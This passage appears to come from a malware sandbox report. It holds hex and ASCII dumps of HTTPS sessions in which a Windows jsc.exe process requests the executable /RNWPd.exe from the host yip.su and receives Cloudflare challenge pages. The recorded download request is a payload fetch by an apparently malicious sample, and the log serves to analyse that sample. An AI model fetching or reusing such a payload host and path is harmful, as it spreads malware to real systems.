                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:09:49 UTC681INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 47 66 69 58 2f 49 55 4a 67 4b 67 57 4b 52 75 35 6b 42 57 74 31 6e 65 4a 59 66 73 44 65 46 45 4c 31 44 4d 4c 55 66 57 4b 42 72 63 59 38 49 4c 54 65 6d 6f 42 30 51 39 47 6f 67 64 47 34 6e 42 6c 70 37 36 75 4f 44 2f 6e 75 59 73 6a 66 57 4d 39 6f 65 4c 59 4e 6d 67 76 48 34 67 34 64 39 76 46 71 53 46 70 48 66 67 4c 39 55 34 3d 24 30 53 76 49 72 31 42 51 4d 76 63 6e 64 6b 43 79 6b 47 48 43 6f 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: GfiX/IUJgKgWKRu5kBWt1neJYfsDeFEL1DMLUfWKBrcY8ILTemoB0Q9GogdG4nBlp76uOD/nuYsjfWM9oeLYNmgvH4g4d9vFqSFpHfgL9U4=$0SvIr1BQMvcndkCykGHCoA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:09:49 UTC1369INData Raw: 33 65 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e11<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:09:49 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:09:49 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:09:49 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:09:49 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:09:49 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:09:49 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:09:49 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 35 33 39 36 38 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 64 39 61 63 66 66 35 37 38 64 30 27 2c 63 48 61 73 68 3a 20 27 33 64 61 37 30 65 34 39 36 32 64 33 32 32 62 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 4d 37 64 33 6e 68 49 5f 77 36 45 46 4e 7a 5a 4b 72 68 59 47 2e 4b 37 33 79 48 44 6a 67 36 4a 62 30 66 4b 30 65 2e 55 32 51 34 55 2d 31 37 32 33 39 33 32 35 38 39 2d 30 2e 30 2e 31 2e 31 2d 34 31 35 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '53968',cRay: '8b4cfd9acff578d0',cHash: '3da70e4962d322b',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=M7d3nhI_w6EFNzZKrhYG.K73yHDjg6Jb0fK0e.U2Q4U-1723932589-0.0.1.1-4158",cFPWv: 'g',cTTim
                                    2024-08-17 22:09:49 UTC1369INData Raw: 71 4b 6b 65 6a 45 64 5f 73 38 4d 6c 63 58 71 33 4a 34 57 79 33 42 34 46 42 4f 55 68 6f 31 7a 49 68 35 66 5f 6d 63 6d 6b 54 63 43 2e 43 45 63 72 46 36 48 74 4e 49 5f 78 63 50 2e 78 7a 34 71 6d 67 52 37 47 50 67 37 71 59 44 6b 59 4c 4b 4a 42 41 44 43 52 33 62 52 6a 48 42 67 30 55 5f 55 69 4f 33 2e 54 66 32 41 63 33 39 35 5f 43 54 6a 70 4d 79 7a 37 51 4f 52 75 51 6d 5a 43 67 41 35 52 5a 66 44 58 4b 4a 66 4d 4f 52 4e 6c 39 79 75 32 58 58 4f 62 51 75 5f 31 76 2e 42 34 39 49 6a 50 50 54 46 53 35 69 52 51 2e 7a 67 73 56 70 73 70 56 52 64 68 55 50 49 6e 57 5f 41 4f 62 4e 55 65 64 4f 59 30 4c 4a 6b 72 73 56 7a 72 75 59 67 32 6f 52 76 31 6b 76 5a 70 48 34 38 79 46 56 61 64 4b 68 76 52 53 42 66 65 67 54 44 7a 73 61 64 50 6f 66 4d 36 77 48 77 74 6f 4e 47 55 6e 52 57
                                    Data Ascii: qKkejEd_s8MlcXq3J4Wy3B4FBOUho1zIh5f_mcmkTcC.CEcrF6HtNI_xcP.xz4qmgR7GPg7qYDkYLKJBADCR3bRjHBg0U_UiO3.Tf2Ac395_CTjpMyz7QORuQmZCgA5RZfDXKJfMORNl9yu2XXObQu_1v.B49IjPPTFS5iRQ.zgsVpspVRdhUPInW_AObNUedOY0LJkrsVzruYg2oRv1kvZpH48yFVadKhvRSBfegTDzsadPofM6wHwtoNGUnRW


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    37192.168.2.549763188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:54 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:54 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:09:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:09:54 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 61 6b 5a 31 6e 76 61 75 34 7a 53 32 4b 37 6f 75 67 4b 47 49 6f 71 2b 55 34 36 76 4b 4b 52 35 73 63 55 70 30 48 51 44 38 55 7a 62 57 41 46 43 58 54 4b 72 63 64 4e 78 33 43 42 64 6c 4b 39 7a 6c 46 58 4c 32 54 56 53 73 4d 53 34 36 63 48 38 35 38 30 69 71 41 54 44 33 57 52 47 45 4a 4b 48 50 75 38 58 6b 73 4f 74 79 42 4d 63 3d 24 58 39 59 59 78 36 62 48 43 2b 6f 66 57 65 67 7a 34 63 69 55 45 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: akZ1nvau4zS2K7ougKGIoq+U46vKKR5scUp0HQD8UzbWAFCXTKrcdNx3CBdlK9zlFXL2TVSsMS46cH8580iqATD3WRGEJKHPu8XksOtyBMc=$X9YYx6bHC+ofWegz4ciUEQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:09:54 UTC768INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:09:54 UTC1369INData Raw: 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76
                                    Data Ascii: y .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5v
                                    2024-08-17 22:09:54 UTC1369INData Raw: 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c
                                    Data Ascii: .no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{col
                                    2024-08-17 22:09:54 UTC1369INData Raw: 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 6c 69 67 68 74 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64
                                    Data Ascii: Mzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{color:#ee730a;text-decoration:underline}body.light .lds-ring div{bord
                                    2024-08-17 22:09:54 UTC1369INData Raw: 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 63 6f 6c 6f 72 20
                                    Data Ascii: 4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color:transparent;color:#0051c3;text-decoration:none;transition:color
                                    2024-08-17 22:09:54 UTC1369INData Raw: 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f
